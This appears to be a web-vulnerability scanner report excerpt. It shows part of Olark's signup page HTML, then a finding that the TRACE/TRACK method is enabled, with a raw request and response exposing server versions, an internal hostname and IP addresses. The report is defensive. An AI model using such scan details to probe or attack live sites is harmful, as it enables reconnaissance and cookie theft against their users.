<span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div><div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tmp_tooltip = document.createElement("a"); createQtip({ object:tmp_tooltip, // TODO, append the old controller and action in here url: $.query.get("show_dialog"), text: '' }); $(tmp_tooltip).click(); } // TODO: Move all this javascript somewhere else. //Code for checking whether site.begin_called_at returns true and corresponding UI feedback //generate 2 tooltips initially var failure = document.createElement("a"); var success = document.createElement("a"); createQtip({object: failure, url: "/site/begin_called_at_false", text: "&nbsp;"}); cr..
TRACE / TRACK Identified

TRACE / TRACK Identified
1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /signup/create_new_account

/signup/create_new_account CONFIRMED

http://www.olark.com/signup/create_new_account

Request

TRACE /signup/create_new_account HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.olark.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:56 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
Content-Type: message/http
Via: 1.1 web2.local
Transfer-Encoding: chunked
X-Pad: avoid browser bug


TRACE /signup/create_new_account HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
X-Forwarded-For: 173.193.214.243, 10.177.72.185
Via: 1.1 web2.local
X-Forwarded-Host: www.olark.com
X-Forwarded-Server: web2.local
Connection: Keep-Alive